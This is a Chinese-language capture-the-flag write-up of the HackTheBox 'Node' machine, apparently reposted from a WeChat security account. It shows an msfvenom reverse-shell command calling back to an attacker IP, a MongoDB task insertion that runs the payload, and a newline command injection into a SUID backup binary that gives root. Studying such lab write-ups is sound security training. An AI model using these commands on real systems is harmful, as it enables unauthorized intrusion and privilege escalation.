记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

HackTheBox-Linux-Node

2021-08-07 12:25

一个每日分享渗透小技巧的公众号



大家好,这里是 大余安全 的第 117 篇文章,本公众号会每日分享攻防渗透技术给大家。



靶机地址:https://www.hackthebox.eu/home/machines/profile/110

靶机难度:中级(4.3/10)

靶机发布日期:2017年10月24日

靶机描述:

Node focuses mainly on newer software and poor configurations. The machine starts out seemingly easy, but gets progressively harder as more access is gained. In-depth enumeration is required at several steps to be able to progress further into the machine.


请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。



一、信息收集


可以看到靶机的IP是10.10.10.58....

nmap仅发现开放了OpenSSH和Node.js....

访问web发现存在个登陆界面login....

丢着爆破,刚开始就报断点错误,根据做vulnhub靶机经验,这是半张笑脸....后面继续爆破就没任何目录信息....

查看前端代码,很多js文件...都查看了一番

发现存在/api/users/latest信息目录...

进入去掉latest,获得了0类的密匙信息....

通过爆破哈希值,获得了密码...这里测试了四个,只有0类可以登陆web....

登陆即可....

进入后download文件...直接下载是无法下载的一直循环下载....

这里需要开启本地代理进行下载....

下载完后读取发现是base64值,解码后读取文件类型,可看到是ZIP压缩文件...

解压提示需要密码...

这里直接利用fcrackzip暴力破解zip类型文件密码..

成功获得了密码...

解压后,在目录底层继续查看了jx文件内容...

发现了两个信息,mark用户名密码和backup_key....

利用mark用户名密码成功ssh登陆到靶机...

这里存在三个用户mark、frank、tom,直接列举了tom存在运行的进程...又是app.js

查看发现它访问了mongodb数据库,并执行了任务表中放置的所有任务,可看到setInterval函数,该函数可以在cmd值下执行任何操作...

sudo msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -f elf -o dayushell.elf

利用MSF制作shell...然后scp上传...

mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
use schedulershow collectionsdb.tasks.insertOne({cmd:'/tmp/dayushell.elf'})

登录到mongodb,并使用语法插入要执行的有效负载...

过1分钟左右获得了反向外壳....

上传LinEnum.sh枚举,枚举SUID时,发现了backup二进制文件...和app.js内看到的backup_key感觉是相匹配的信息...

将backup下载到本地...

通过IDA查看发现,二进制文件的main函数检查有3个,如果返回false,它将跳转到左侧的块以完全退出...

测试给了它3个论点,输出了内容....

strace ./backup 1 2 3

利用strace调用跟踪程序走向信息...可以看到程序正在尝试读取/etc/myplace/keys中的内容,去看看....

三个密匙....

返回查看backup_key,和前面keys对比,发现第一个密匙凭证一样的...果然是有关联的...

ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /tmp/a

利用ltrace继续进行探测...这里科普下哈:

strace------跟踪进程的系统调用或信号产生的情况

ltrace-------跟踪进程调用库函数的情况

可以看到该目录使用magicword作为密码进行了压缩,然后该zip文件已进行base64编码,另外注意到有许多使用strchr()或strstr()的过滤器,这里可以绕过他们提权...

./backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf '\n/bin/sh\necho OK')"

利用$(),printf和换行符的组合来注入命令成功获得了root权限,并获得了user_flag和root_flag信息...


这里backup还可以利用缓冲区溢出,或者我也提示了base64和magicword密码,可以直接提取root_base64值,然后获得root_flag....


web信息收集+hash爆破+ZIP爆破+mongodb数据库分析提权+信息枚举+backup二进制解析提权


由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。


如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~



随缘收徒中~~随缘收徒中~~随缘收徒中~~


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!


大余安全

一个全栈渗透小技巧的公众号




知识来源: https://mp.weixin.qq.com/s?__biz=Mzg3MDMxMTg3OQ==&mid=2247493627&idx=1&sn=1c7c21d328e9f8f26de36589753a8363

阅读:113663 | 评论:0 | 标签:linux hack

想收藏或者和大家分享这篇好文章→复制链接地址

“HackTheBox-Linux-Node”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁